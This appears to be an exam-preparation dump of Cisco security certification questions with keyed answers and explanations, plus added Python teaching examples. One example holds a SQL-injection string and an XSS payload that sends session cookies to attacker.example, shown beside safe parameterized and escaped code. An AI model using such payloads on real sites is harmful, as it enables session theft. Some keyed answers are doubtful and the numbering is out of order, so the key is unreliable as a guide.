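"""Client ID + API key -> HTTP Basic credentials for the AMP for Endpoints API.
Added example using only the standard library; nothing is sent on the wire."""
import base64
import urllib.request

AMP_API = "https://api.amp.cisco.com/v1/computers"

# Placeholder values from the exhibit; they are not working credentials.
client_id = "a1b2c3d4e5f6g7h8i9j0"
api_key = "a1b2c3d4-e5f6-g7h8-i9j0-k1l2m3n4o5p6"


def basic_auth_header(client_id, api_key):
    """Build the Authorization header value: 'Basic ' + base64('id:key')."""
    raw = f"{client_id}:{api_key}".encode("ascii")
    return "Basic " + base64.b64encode(raw).decode("ascii")


def build_request(url, client_id, api_key):
    """Prepare a GET request carrying the credentials; does not send it."""
    req = urllib.request.Request(url, method="GET")
    req.add_header("Authorization", basic_auth_header(client_id, api_key))
    req.add_header("Accept", "application/json")
    return req


def decode_basic(header_value):
    """Recover (user, secret) from a Basic header: base64 hides nothing."""
    scheme, _, token = header_value.partition(" ")
    if scheme != "Basic":
        raise ValueError("not a Basic authorization header")
    user, _, secret = base64.b64decode(token).decode("ascii").partition(":")
    return user, secret


if __name__ == "__main__":
    req = build_request(AMP_API, client_id, api_key)
    print(req.get_method(), req.full_url)
    print("Authorization:", req.get_header("Authorization"))
    print("decodes back to:", decode_basic(req.get_header("Authorization")))
    # urllib.request.urlopen(req) would perform the call; the credentials are
    # only safe because the endpoint is HTTPS and the key is kept off disk.
```

Because the header decodes trivially, anything that logs request headers (proxies, debug output, crash dumps) leaks the API key; rotate it from the AMP console if it ever appears in such a place.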

Question 110

How does the Cisco WSA enforce bandwidth restrictions for web applications?

A. It implements a policy route to redirect application traffic to a lower-bandwidth link


B. It dynamically creates a scavenger class QoS policy and applies it to each client that connects through
the WSA
C. It sends commands to the uplink router to apply traffic policing to the application traffic
D. It simulates a slower link by introducing latency into application traffic

Answer: D

Explanation

Defining bandwidth limits only throttles the data going to users. It does not block data based on reaching
a quota. The Web Proxy introduces latency into each application transaction to mimic a slower link to the
server.

Reference: https://www.cisco.com/c/en/us/td/docs/security/wsa/wsa11-
8/user_guide/b_WSA_UserGuide_11_8/b_WSA_UserGuide_11_7_chapter_01111.html

Question 111

Which feature within Cisco ISE verifies the compliance of an endpoint before providing access to the
network?

A. Posture
B. Profiling
C. pxGrid
D. MAB

Answer: A

Question 112

Which Cisco AMP feature allows an engineer to look back to trace past activities, such as file and process
activity on an endpoint?

A. endpoint isolation
B. advanced search
C. advanced investigation
D. retrospective security

Answer: D

Explanation

Retrospective security lets administrators look at their systems as if they had a time machine. They can
view any point in the past with tools such as retrospection, attack chain correlation, behavioral indications
of compromise (IOCs), trajectory and breach hunting. Plus, they can see how their security environments
have changed, rather than just viewing network aspects at a single point.

Reference: https://imaginenext.ingrammicro.com/security/comparison-point-in-time-vs-retrospective-
security

Question 1

What is a functional difference between a Cisco ASA and a Cisco IOS router with Zone-based policy
firewall?

A. The Cisco ASA denies all traffic by default whereas the Cisco IOS router with Zone-Based Policy Firewall
starts out by allowing all traffic, even on untrusted interfaces.
B. The Cisco IOS router with Zone-Based Policy Firewall can be configured for high availability, whereas
the Cisco ASA cannot
C. The Cisco IOS router with Zone-Based Policy Firewall denies all traffic by default, whereas the Cisco
ASA starts out by allowing all traffic until rules are added
D. The Cisco ASA can be configured for high availability whereas the Cisco IOS router with Zone-Based
Policy Firewall cannot

Answer: A

Explanation

Both the Cisco ASA and a Cisco IOS router running Zone-Based Policy Firewall support high availability, so
answers B and D are wrong.
Once zones are configured, Zone-Based Policy Firewall drops traffic between zones by default until a zone
pair with a policy permits it, so it is not accurate to say that the IOS firewall itself allows all traffic.
The Cisco ASA is deny-by-default: unsolicited traffic from a lower-security interface to a higher-security
interface is dropped unless an ACL permits it.

The answer key follows a similar statement found elsewhere:

The ASA denies all traffic by default, while the IOS router starts out by allowing all traffic, even on your
untrusted interfaces.

Reference: https://www.plixer.com/blog/cisco-zone-based-firewall-reporting/

So the question most likely means that a Cisco IOS router allows all traffic by default before Zone-Based
Policy Firewall is applied: a plain IOS router is a router, not a firewall, and forwards everything it has a
route for.

Question 2

What is a benefit of performing device compliance?

A. verification of the latest OS patches
B. device classification and authorization
C. providing multi-factor authentication
D. providing attribute-driven policies

Answer: A

Question 3

Which cloud model is a collaborative effort where infrastructure is shared and jointly accessed by several
organizations from a specific group?

A. hybrid
B. community
C. private
D. public

Answer: B

Explanation

A community cloud makes systems and services accessible to a group of organizations: the infrastructure is
shared among several organizations from a specific community and may be managed by one of those
organizations or by a third party.

Question 4

Which cryptographic process provides origin confidentiality, integrity, and origin authentication for
packets?

A. IKEv1
B. AH
C. ESP
D. IKEv2

Answer: C

Question 5

An organization wants to secure users, data, and applications in the cloud. The solution must be API-based
and operate as a cloud-native CASB. Which solution must be used for this implementation?

A. Cisco Cloudlock
B. Cisco Cloud Email Security
C. Cisco Firepower Next-Generation Firewall
D. Cisco Umbrella

Answer: A

Explanation

Cisco Cloudlock: Secure your cloud users, data, and applications with the cloud-native Cloud Access
Security Broker (CASB) and cloud cybersecurity platform.

Reference: https://www.cisco.com/c/dam/en/us/products/collateral/security/cloud-web-security/at-a-
glance-c45-738565.pdf

Question 6

What are two Trojan malware attacks? (Choose two)

A. frontdoor
B. rootkit
C. smurf
D. backdoor
E. sync

Answer: B D

Question 7

What is the role of Cisco Umbrella Roaming when it is installed on an endpoint?

A. to protect the endpoint against malicious file transfers
B. to ensure that assets are secure from malicious links on and off the corporate network
C. to establish secure VPN connectivity to the corporate network
D. to enforce posture compliance and mandatory software

Answer: B

Explanation

Umbrella Roaming is a cloud-delivered security service for Cisco’s next-generation firewall. It protects your
employees even when they are off the VPN.

Question 8

What is a capability of Cisco ASA Netflow?

A. It filters NSEL events based on traffic.
B. It generates NSEL events even if the MPF is not configured.
C. It logs all event types only to the same collector.
D. It sends NetFlow data records from active and standby ASAs in an active standby failover pair.

Answer: A

Question 9

Which component of Cisco umbrella architecture increases reliability of the service?

A. Anycast IP
B. AMP Threat grid
C. Cisco Talos
D. BGP route reflector

Answer: A

Explanation

Cisco Umbrella Uses Anycast IP routing in order to provide reliability of the recursive DNS service.

Question 10

What is the benefit of integrating Cisco ISE with a MDM solution?

A. It provides compliance checks for access to the network
B. It provides the ability to update other applications on the mobile device
C. It provides the ability to add applications to the mobile device through Cisco ISE
D. It provides network device administration access

Answer: A

Explanation

Mobile Device Management (MDM) software secures, monitors, manages and supports mobile devices
deployed across mobile operators, service providers and enterprises. A typical MDM product consists of a
policy server, a mobile device client and an optional inline enforcement point that controls the use of some
applications on a mobile device (like email) in the deployed environment. However the network is the only
entity that can provide granular access to endpoints (based on ACL’s, TrustSec SGT’s etc). It is envisaged
that Cisco Identity Services Engine (ISE) would be an additional network based enforcement point while
the MDM policy server would serve as the policy decision point. ISE expects specific data from MDM
servers to provide a complete solution

The following are the high level use cases in this solution.
+ Device registration- Non registered endpoints accessing the network on-premises will be redirected to
registration page on MDM server for registration based on user role, device type, etc
+ Remediation- Non compliant endpoints will be given restricted access based on compliance state
+ Periodic compliance check – Periodically check with MDM server for compliance
+ Ability for ISE administrators to issue remote actions on the device through the MDM server (e.g.:
remote wiping of the managed device)
+ Ability for end user to leverage the ISE My Devices Portal to manage personal devices, e.g. Full Wipe,
Corporate Wipe and PIN Lock.

Reference: https://community.cisco.com/t5/security-documents/cisco-ise-integration-with-mobile-device-
management-mdm/ta-p/3784691

Also in the attached PDF of above link:

If the user device is not in compliant to the posture (compliance) policies configured on MDM, they will be
notified that the device is out of compliance, reason for non-compliance and the need to be in compliance
to access network resources.

Question 11

An administrator configures a new destination list in Cisco Umbrella so that the organization can block
specific domains for its devices. What should be done to ensure that all subdomains of domain.com are
blocked?

A. Configure the *.com address in the block list.
B. Configure the *.domain.com address in the block list
C. Configure the www.domain.com address in the block list
D. Configure the domain.com address in the block list

Answer: D

Explanation

It is not possible to use an asterisk to wildcard a different part of the domain. The following will not work:
*.domain.com
subdomain.*.com
sub*.com
domain.*

Reference: https://docs.umbrella.com/deployment-umbrella/docs/wild-cards

Configuring domain.com in the block list implicitly blocks *.domain.com as well: the domain itself and
every subdomain of it are blocked, with no wildcard needed.
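Added example (not Umbrella's code) of the matching rule the explanation describes: an entry for domain.com covers the domain itself and every subdomain by a label-boundary suffix match, a lookalike such as notdomain.com is not covered, and an entry containing an asterisk matches nothing, since the documentation above says those forms do not work. The function names and the test names are made up for the example.

```python
"""Destination-list matching as the Umbrella docs describe it.
Added example; not Umbrella's implementation."""


def normalize(name):
    """Lower-case and strip a trailing dot so comparisons use canonical names."""
    return name.strip().rstrip(".").lower()


def entry_is_valid(entry):
    """Wildcard forms (*.domain.com, sub*.com, domain.*) do not work in Umbrella."""
    return "*" not in entry


def invalid_entries(block_list):
    """Entries an administrator should be told will never match."""
    return [e for e in block_list if not entry_is_valid(e)]


def is_blocked(qname, block_list):
    """True if qname equals an entry or is a subdomain of one.

    The suffix test includes the leading dot so that notdomain.com is not
    matched by an entry for domain.com.
    """
    q = normalize(qname)
    for entry in block_list:
        if not entry_is_valid(entry):
            continue  # a wildcard entry matches nothing
        e = normalize(entry)
        if q == e or q.endswith("." + e):
            return True
    return False


if __name__ == "__main__":
    block_list = ["domain.com", "*.other.com"]  # constructed list
    print("unusable entries:", invalid_entries(block_list))
    for name in ["domain.com", "a.b.domain.com", "notdomain.com",
                 "domain.com.evil.net", "sub.other.com"]:
        print(f"{name:25} blocked={is_blocked(name, block_list)}")
```

The same suffix rule is why answer B is wrong in a second way: even if the wildcard were accepted, *.domain.com would not cover the bare domain.com, whereas the plain entry covers both.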

Question 12

An organization wants to provide visibility and to identify active threats in its network using a VM. The
organization wants to extract metadata from network packet flow while ensuring that payloads are not
retained or transferred outside the network. Which solution meets these requirements?

A. Cisco Umbrella Cloud
B. Cisco Stealthwatch Cloud PNM
C. Cisco Stealthwatch Cloud PCM
D. Cisco Umbrella On-Premises

Answer: B

Explanation

Private Network Monitoring (PNM) provides visibility and threat detection for the on-premises network,
delivered from the cloud as a SaaS solution. It is the perfect solution for organizations who prefer SaaS
products and desire better awareness and security in their on-premises environments while reducing
capital expenditure and operational overhead. It works by deploying lightweight software in a virtual
machine or server that can consume a variety of native sources of telemetry or extract metadata from
network packet flow. It encrypts this metadata and sends it to the Stealthwatch Cloud analytics platform
for analysis. Stealthwatch Cloud consumes metadata only. The packet payloads are never retained or
transferred outside the network.

This lab focuses on how to configure a Stealthwatch Cloud Private Network Monitoring (PNM) Sensor, in
order to provide visibility and effectively identify active threats, and monitors user and device behavior
within on-premises networks.

The Stealthwatch Cloud PNM Sensor is an extremely flexible piece of technology, capable of being utilized
in a number of different deployment scenarios. It can be deployed as a complete Ubuntu based virtual
appliance on different hypervisors (e.g. –VMware, VirtualBox). It can be deployed on hardware running a
number of different Linux-based operating systems.

Reference: https://www.ciscolive.com/c/dam/r/ciscolive/us/docs/2019/pdf/5eU6DfQV/LTRSEC-2240-
LG2.pdf

Question 13

An organization deploys multiple Cisco FTD appliances and wants to manage them using one centralized
solution. The organization does not have a local VM but does have existing Cisco ASAs that must migrate
over to Cisco FTDs. Which solution meets the needs of the organization?

A. Cisco FMC
B. CSM
C. Cisco FDM
D. CDO

Answer: A

Question 14

An organization wants to secure data in a cloud environment. Its security model requires that all users be
authenticated and authorized. Security configuration and posture must be continuously validated before
access is granted or maintained to applications and data. There is also a need to allow certain application
traffic and deny all other traffic by default. Which technology must be used to implement these
requirements?

A. virtual routing and forwarding
B. microsegmentation
C. access control policy
D. virtual LAN

Answer: B

Explanation

Zero Trust is a security framework requiring all users, whether in or outside the organization’s network, to
be authenticated, authorized, and continuously validated for security configuration and posture before
being granted or keeping access to applications and data. Zero Trust assumes that there is no traditional
network edge; networks can be local, in the cloud, or a combination or hybrid with resources anywhere as
well as workers in any location.

The Zero Trust model uses microsegmentation — a security technique that involves dividing perimeters
into small zones to maintain separate access to every part of the network — to contain attacks.

Question 15

A Cisco FTD engineer is creating a new IKEv2 policy called s2s00123456789 for their organization to allow
for additional protocols to terminate network devices with. They currently only have one policy established
and need the new policy to be a backup in case some devices cannot support the stronger algorithms
listed in the primary policy. What should be done in order to support this?

A. Change the integrity algorithms to SHA* to support all SHA algorithms in the primary policy
B. Make the priority for the new policy 5 and the primary policy 1.
C. Change the encryption to AES* to support all AES algorithms in the primary policy
D. Make the priority for the primary policy 10 and the new policy 1

Answer: B

Explanation

All IKE policies on the device are sent to the remote peer regardless of what is in the selected policy
section. The first IKE Policy matched by the remote peer will be selected for the VPN connection. Choose
which policy is sent first using the priority field. Priority 1 will be sent first.

Reference: https://www.cisco.com/c/en/us/support/docs/security-vpn/ipsec-negotiation-ike-
protocols/215470-site-to-site-vpn-configuration-on-ftd-ma.html

Question 16

Which type of encryption uses a public key and private key?

A. asymmetric
B. symmetric
C. linear
D. nonlinear

Answer: A

Question 17

What are two features of NetFlow flow monitoring? (Choose two)

A. Can track ingress and egress information
B. Include the flow record and the flow importer
C. Copies all ingress flow information to an interface
D. Does not require packet sampling on interfaces
E. Can be used to track multicast, MPLS, or bridged traffic

Answer: A E

Explanation

The following are restrictions for Flexible NetFlow:

+ Traditional NetFlow (TNF) accounting is not supported.
+ Flexible NetFlow v5 export format is not supported, only NetFlow v9 export format is supported.
+ Both ingress and egress NetFlow accounting is supported.
+ Microflow policing feature shares the NetFlow hardware resource with FNF.
+ Only one flow monitor per interface and per direction is supported.

Reference: https://www.cisco.com/en/US/docs/switches/lan/catalyst3850/software/release/3se/consolidat
ed_guide/b_consolidated_3850_3se_cg_chapter_011010.html

When configuring NetFlow, follow these guidelines and restrictions:

+ Except in PFC3A mode, NetFlow supports bridged IP traffic. PFC3A mode does not support NetFlow
bridged IP traffic.
+ NetFlow supports multicast IP traffic.

Reference: https://www.cisco.com/en/US/docs/general/Test/dwerblo/broken_guide/netflow.html

The Flexible NetFlow – MPLS Egress NetFlow feature allows you to capture IP flow information for packets
that arrive on a router as Multiprotocol Label Switching (MPLS) packets and are transmitted as IP packets.
This feature allows you to capture the MPLS VPN IP flows that are traveling through the service provider
backbone from one site of a VPN to another site of the same VPN

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-
book/cfg-mpls-netflow.html

Question 18

A customer has various external HTTP resources available including Intranet Extranet and Internet, with a
proxy configuration running in explicit mode. Which method allows the client desktop browsers to be
configured to select when to connect direct or when to use the proxy?

A. Transport mode
B. Forward file
C. PAC file
D. Bridge mode

Answer: C

Explanation

A Proxy Auto-Configuration (PAC) file is a JavaScript function definition that determines whether web
browser requests (HTTP, HTTPS, and FTP) go direct to the destination or are forwarded to a web proxy
server.
PAC files are used to support explicit proxy deployments in which client browsers are explicitly configured
to send traffic to the web proxy. The big advantage of PAC files is that they are usually relatively easy to
create and maintain.

Question 19

Which Talos reputation center allows for tracking the reputation of IP addresses for email and web traffic?

A. IP and Domain Reputation Center
B. File Reputation Center
C. IP Block List Center
D. AMP Reputation Center

Answer: A

Question 20

An engineer is configuring IPsec VPN and needs an authentication protocol that is reliable and supports
ACK and sequence. Which protocol accomplishes this goal?

A. AES-192
B. IKEv1
C. AES-256
D. ESP

Answer: D

Question 21

An administrator is establishing a new site-to-site VPN connection on a Cisco IOS router. The organization
needs to ensure that the ISAKMP key on the hub is used only for terminating traffic from the IP address of
172.19.20.24. Which command on the hub will allow the administrator to accomplish this?

A. crypto ca identity 172.19.20.24
B. crypto isakmp key Cisco0123456789 172.19.20.24
C. crypto enrollment peer address 172.19.20.24
D. crypto isakmp identity address 172.19.20.24

Answer: B

Explanation

The command "crypto isakmp identity address 172.19.20.24" is not valid. The syntax is "crypto isakmp
identity {address | hostname}", which only selects whether the router identifies itself to peers by IP
address or by host name; it takes no peer address. The following example uses preshared keys at two peers
and sets both their ISAKMP identities to the IP address.

At the local peer (at 10.0.0.1) the ISAKMP identity is set and the preshared key is specified:
crypto isakmp identity address
crypto isakmp key sharedkeystring address 192.168.1.33

At the remote peer (at 192.168.1.33) the ISAKMP identity is set and the same preshared key is specified:
crypto isakmp identity address
crypto isakmp key sharedkeystring address 10.0.0.1

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/security/a1/sec-a1-cr-book/sec-cr-
c4.html#wp3880782430

The command "crypto enrollment peer address" is not valid either.

The command "crypto ca identity ..." only declares a trusted CA for the router and enters ca-identity
configuration mode. It is followed by a name, not an IP address, for example "crypto ca identity
CA-Server", so answer A is not correct.

Answer B is the only remaining choice. Note that the full IOS syntax is "crypto isakmp key
Cisco0123456789 address 172.19.20.24": the "address" (or "hostname") keyword between the key string and
the peer is required, and it is this per-peer binding that restricts the key to the peer at 172.19.20.24.
An optional mask after the address binds the key to a whole subnet of peers instead of a single host, so
omit it when the key must be used by one spoke only.

Question 22

What is a difference between an XSS attack and an SQL injection attack?

A. SQL injection is a hacking method used to attack SQL databases, whereas XSS attacks can exist in
many different types of applications
B. XSS is a hacking method used to attack SQL databases, whereas SQL injection attacks can exist in
many different types of applications
C. SQL injection attacks are used to steal information from databases whereas XSS attacks are used to
redirect users to websites where attackers can steal data from them
D. XSS attacks are used to steal information from databases whereas SQL injection attacks are used to
redirect users to websites where attackers can steal data from them

Answer: C

Explanation

In XSS, an attacker injects client-side script (or markup carrying a malicious link) into a page that the
application serves to other users, either by storing it in the application's data store (stored XSS) or by
getting a victim to open a crafted URL whose parameters the page reflects without escaping (reflected XSS).
The victim's browser runs the script in the context of the trusted site, so it can redirect the user to an
attacker-controlled page or send session cookies and tokens there. In SQL injection, an attacker submits
SQL syntax through form fields, cookies, or HTTP headers whose values the application concatenates into a
database query without validation or parameterization, so the injected text changes the query and reads or
modifies data directly in the database.
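Added example (not from the exam material) showing the two injection classes side by side against an in-memory SQLite table: a query assembled from user input next to a parameterized one, and a page that reflects input unescaped next to one that HTML-escapes it. The table, rows and payload strings are constructed for the example.

```python
"""SQL injection and XSS: vulnerable and hardened forms side by side.
Added example; the users table, rows and payloads are constructed here."""
import html
import sqlite3


def make_db():
    """In-memory table with two constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, email TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "alice@example.com"), ("bob", "bob@example.com")])
    return conn


def lookup_vulnerable(conn, username):
    """User input is spliced into the statement, so the input controls SQL syntax."""
    sql = f"SELECT username, email FROM users WHERE username = '{username}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, username):
    """Parameter binding: the input is only ever a string value, never syntax."""
    sql = "SELECT username, email FROM users WHERE username = ?"
    return conn.execute(sql, (username,)).fetchall()


def render_vulnerable(name):
    """Reflecting input into HTML lets the input inject markup and script."""
    return f"<p>Hello, {name}</p>"


def render_safe(name):
    """Escaping turns <, >, &, quotes into entities; the browser shows text only."""
    return f"<p>Hello, {html.escape(name)}</p>"


# Constructed payloads: the first closes the quoted value and adds a
# tautology; the second is a script that ships the session cookie elsewhere.
SQLI_PAYLOAD = "x' OR '1'='1"
XSS_PAYLOAD = "<script>location='https://attacker.example/?c='+document.cookie</script>"


if __name__ == "__main__":
    conn = make_db()
    print("vulnerable lookup:", lookup_vulnerable(conn, SQLI_PAYLOAD))  # both rows
    print("safe lookup:      ", lookup_safe(conn, SQLI_PAYLOAD))        # no rows
    print(render_vulnerable(XSS_PAYLOAD))
    print(render_safe(XSS_PAYLOAD))
```

The two defences are different because the two sinks are different: binding parameters keeps data out of the SQL parser, escaping keeps data out of the HTML parser, and neither one helps against the other class.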

Question 23

An engineer has been tasked with configuring a Cisco FTD to analyze protocol fields and detect anomalies
in the traffic from industrial systems. What must be done to meet these requirements?

A. Implement pre-filter policies for the CIP preprocessor
B. Enable traffic analysis in the Cisco FTD
C. Configure intrusion rules for the DNP3 preprocessor
D. Modify the access control policy to trust the industrial traffic

Answer: A

Explanation

The Modbus, DNP3, and CIP SCADA preprocessors detect traffic anomalies and provide data to intrusion
rules. Therefore in this question only answer A or answer C is correct.

The DNP3 preprocessor detects anomalies in DNP3 traffic and decodes the DNP3 protocol for processing by
the rules engine, which uses DNP3 keywords to access certain protocol fields.

The Common Industrial Protocol (CIP) is a widely used application protocol that supports industrial
automation applications. EtherNet/IP is an implementation of CIP that is used on Ethernet-based
networks. The CIP preprocessor detects CIP and ENIP traffic running on TCP or UDP and sends it to the
intrusion rules engine. You can use CIP and ENIP keywords in custom intrusion rules to detect attacks in
CIP and ENIP traffic.

Reference: https://www.cisco.com/c/en/us/td/docs/security/firepower/630/configuration/guide/fpmc-
config-guide-v63/scada_preprocessors.html

Both DNP3 and CIP preprocessors can be used to detect traffic anomalies but we choose CIP as it is widely
used in industrial applications.

Note:
+ An intrusion rule is a specified set of keywords and arguments that the system uses to detect attempts
to exploit vulnerabilities in your network. As the system analyzes network traffic, it compares packets
against the conditions specified in each rule, and triggers the rule if the data packet meets all the
conditions specified in the rule.
+ Preprocessor rules, which are rules associated with preprocessors and packet decoder detection options
in the network analysis policy. Most preprocessor rules are disabled by default.

Question 24

Which posture assessment requirement provides options to the client for remediation and requires the
remediation within a certain timeframe?

A. Audit
B. Mandatory
C. Optional
D. Visibility

Answer: B

Explanation

A posture requirement is a set of compound conditions with an associated remediation action that can be
linked with a role and an operating system. All the clients connecting to your network must meet
mandatory requirements during posture evaluation to become compliant on the network.

Posture-policy requirements can be set to mandatory, optional, or audit types in posture policies. If
requirements are optional and clients fail these requirements, then the clients have an option to continue
during posture evaluation of endpoints.

Mandatory Requirements

During policy evaluation, the agent provides remediation options to clients who fail to meet the mandatory
requirements defined in the posture policy. End users must remediate to meet the requirements within the
time specified in the remediation timer settings.

For example, you have specified a mandatory requirement with a user-defined condition to check the
existence of C:\temp\text.file in the absolute path. If the file does not exist, the mandatory requirement
fails and the user will be moved to Non-Compliant state.

Reference: https://www.cisco.com/c/en/us/td/docs/security/ise/1-
4/admin_guide/b_ise_admin_guide_14/b_ise_admin_guide_14_chapter_010111.html

Question 25

Which attribute has the ability to change during the RADIUS CoA?

A. NTP
B. authorization
C. accessibility
D. membership

Answer: B

Explanation

The RADIUS Change of Authorization (CoA) feature provides a mechanism to change the attributes of an
authentication, authorization, and accounting (AAA) session after it is authenticated.

Reference: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_usr_aaa/configuration/15-sy/sec-usr-
aaa-15-sy-book/sec-rad-coa.html

Question 26

With Cisco AMP for Endpoints, which option shows a list of all files that have been executed in your
environment?

A. prevalence
B. file analysis
C. detections
D. vulnerable software
E. threat root cause

Answer: A

Explanation

Prevalence allows you to view files that have been executed in your deployment.

Note: Threat Root Cause shows how malware is getting onto your computers.

Reference: https://docs.amp.cisco.com/en/A4E/AMP%20for%20Endpoints%20User%20Guide.pdf

Question 27

A company discovered an attack propagating through their network via a file. A custom file policy was
created in order to track this in the future and ensure no other endpoints execute the infected file. In
addition, it was discovered during testing that the scans are not detecting the file as an indicator of
compromise. What must be done to ensure that the policy that was created functions as it should?

A. Create an IP block list for the website from which the file was downloaded
B. Block the application that the file was using to open
C. Upload the hash for the file into the policy
D. Send the file to Cisco Threat Grid for dynamic analysis

Answer: C

Question 28

A network engineer is trying to figure out whether FlexVPN or DMVPN would fit better in their
environment. They have a requirement for more stringent security multiple security associations for the
connections, more efficient VPN establishment as well consuming less bandwidth. Which solution would be
best for this and why?

A. DMVPN because it supports IKEv2 and FlexVPN does not.
B. FlexVPN because it supports IKEv2 and DMVPN does not.
C. FlexVPN because it uses multiple SAs and DMVPN does not.
D. DMVPN because it uses multiple SAs and FlexVPN does not.

Answer: C

Explanation

FlexVPN supports IKEv2 -> Answer A is not correct.
DMVPN supports both IKEv1 & IKEv2 -> Answer B is not correct.
FlexVPN supports multiple SAs -> Answer D is not correct.

Therefore answer C is the best choice left.

Question 29

How does Cisco Workload Optimization Manager help mitigate application performance issues?

A. It deploys an AWS Lambda system
B. It automates resource resizing
C. It optimizes a flow path
D. It sets up a workload forensic score

Answer: B

Explanation

Cisco Workload Optimization Manager provides specific real-time actions that ensure workloads get the
resources they need when they need them, enabling continuous placement, resizing, and capacity
decisions that can be automated, driving continuous health in the environment. You can automate the
software’s decisions according to your level of comfort: recommend (view only), manual (select and
apply), or automated (executed in real time by software).

Reference: https://www.cisco.com/c/dam/en/us/solutions/collateral/data-center-virtualization/one-enterprise-suite/solution-overview-c22-739078.pdf

Question 30

An organization configures Cisco Umbrella to be used for its DNS services. The organization must be able
to block traffic based on the subnet that the endpoint is on but it sees only the requests from its public IP
address instead of each internal IP address. What must be done to resolve this issue?

A. Set up a Cisco Umbrella virtual appliance to internally field the requests and see the traffic of each IP
address
B. Use the tenant control features to identify each subnet being used and track the connections within the
Cisco Umbrella dashboard
C. Install the Microsoft Active Directory Connector to give IP address information stitched to the requests
in the Cisco Umbrella dashboard
D. Configure an internal domain within Cisco Umbrella to help identify each address and create policy from
the domains

Answer: A

Explanation

Umbrella virtual appliances (VAs) are lightweight virtual machines that are compatible with VMware
ESX/ESXi, Windows Hyper-V, and KVM hypervisors and the Microsoft Azure, Google Cloud Platform, and
Amazon Web Services cloud platforms. When utilized as conditional DNS forwarders on your network,
Umbrella VAs record the internal IP address information of DNS requests for usage in reports, security
enforcement, and category filtering policies.

VAs act as conditional DNS forwarders in your network, intelligently forwarding public DNS queries to Cisco
Umbrella’s global network, and local DNS queries to your existing local DNS servers and forwarders. Every
public DNS query sent to Umbrella is encrypted, authenticated, and includes the client’s internal IP
address.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/1-introduction

If you’re already pointing DNS to Umbrella, or plan to, all the DNS traffic visible in your Umbrella reports
come from a single Network identity. The VAs provide internal IP visibility, allowing you to track down
malicious or inappropriate traffic within your network to a specific IP address.

Without Virtual Appliances: security and DNS traffic-related investigations cannot be traced back to an
individual computer or IP address.

With Virtual Appliances: VAs record the internal IP address of every DNS request, so security and DNS
traffic-related investigations can be associated with an individual, internal IP address.

Reference: https://docs.umbrella.com/deployment-umbrella/docs/1-introduction

Question 31

What is a difference between a DoS attack and a DDoS attack?

A. A DoS attack is where a computer is used to flood a server with TCP and UDP packets whereas a DDoS
attack is where multiple systems target a single system with a DoS attack.
B. A DoS attack is where a computer is used to flood a server with TCP and UDP packets whereas a DDoS
attack is where a computer is used to flood multiple servers that are distributed over a LAN
C. A DoS attack is where a computer is used to flood a server with UDP packets whereas a DDoS attack is
where a computer is used to flood a server with TCP packets
D. A DoS attack is where a computer is used to flood a server with TCP packets whereas a DDoS attack is
where a computer is used to flood a server with UDP packets

Answer: A

Question 32

Which two capabilities of Integration APIs are utilized with Cisco DNA Center? (Choose two)

A. Automatically deploy new virtual routers
B. Upgrade software on switches and routers
C. Application monitors for power utilization of devices and IoT sensors
D. Connect to Information Technology Service Management Platforms
E. Create new SSIDs on a wireless LAN controller

Answer: C D

Explanation

Integration API (Westbound)

Integration capabilities are part of Westbound interfaces. To meet the need to scale and accelerate
operations in modern data centers, IT operators require intelligent, end-to-end work flows built with open
APIs. The Cisco DNA Center platform provides mechanisms for integrating Cisco DNA Assurance workflows
and data with third-party IT Service Management (ITSM) solutions.

Reference: https://developer.cisco.com/docs/dna-center/#!cisco-dna-center-platform-overview/events-and-notifications-eastbound

-> Therefore answer D is correct.

Westbound—Integration APIs
Cisco DNA Center platform can power end-to-end IT processes across the value chain by integrating
various domains such as ITSM, IPAM, and reporting. By leveraging the REST-based Integration Adapter
APIs, bi-directional interfaces can be built to allow the exchange of contextual information between Cisco
DNA Center and the external, third-party IT systems. The westbound APIs provide the capability to publish
the network data, events and notifications to the external systems and consume information in Cisco DNA
Center from the connected systems.

Reference: https://blogs.cisco.com/networking/with-apis-cisco-dna-center-can-improve-your-competitive-advantage

Therefore the most suitable choice is Integration APIs can monitor for power utilization of devices and IoT
sensors -> Answer C is correct.

Question 33

Which kind of API that is used with Cisco DNA Center provisions SSIDs and QoS policies and updates software
versions on switches?

A. integration
B. intent
C. event
D. multivendor

Answer: B

Explanation

Northbound-Intent APIs

Intent APIs enable developers to access Cisco DNA Center Automation and Assurance workflows. Through
this access, you can simplify the process of creating workflows that consolidate multiple network actions.

Say, for instance, you’re configuring an SSID on a wireless network. Using Cisco DNA Center and the
intent APIs, you can offload the process of setting WLAN and security settings. This saves time and
provides greater consistency. You can do the same for QoS policies, software images running on the
network devices, and application health.

Reference: https://www.publicnow.com/view/3057F243685FA76A88EFC1651CAAFD66B5B849FE?1603802892

Question 34

What is the purpose of a CA in a PKI?

A. to issue and revoke digital certificates
B. to validate the authenticity of a digital certificate
C. to create the private key for a digital certificate
D. to certify the ownership of a public key by the named subject

Answer: A

Explanation

A trusted CA is the only entity that can issue trusted digital certificates. This is extremely important
because while PKI manages more of the encryption side of these certificates, authentication is vital to
understanding which entities own what keys. Without a trusted CA, anyone can issue their own keys,
authentication goes out the window and chaos ensues.

Reference: https://cheapsslsecurity.com/blog/understanding-the-role-of-certificate-authorities-in-pki/

Question 35

Which DevSecOps implementation process delivers weekly or daily updates to the applications instead of
monthly or quarterly ones?

A. orchestration
B. CI/CD pipeline
C. container
D. security

Answer: B

Explanation

Unlike the traditional software life cycle, the CI/CD implementation process gives a weekly or daily update
instead of monthly or quarterly. The fun part is customers won’t even realize the update is in their
applications, as they happen on the fly.

Reference: https://devops.com/how-to-implement-an-effective-ci-cd-pipeline/

Question 36

Which parameter is required when configuring a Netflow exporter on a Cisco Router?

A. DSCP value
B. source interface
C. exporter name
D. exporter description

Answer: C

Explanation

Of the listed choices, only the exporter name is required: it is the argument of the flow exporter
command itself. A destination (and usually the transport) is then configured under it; the source
interface, DSCP value and description are optional. An example of configuring a NetFlow exporter is shown
below:

flow exporter Exporter
 destination 192.168.100.22
 transport udp 2055
!

Question 37

Which category includes DoS attacks?

A. virus attacks
B. trojan attacks
C. flood attacks
D. phishing attacks

Answer: C

Question 38

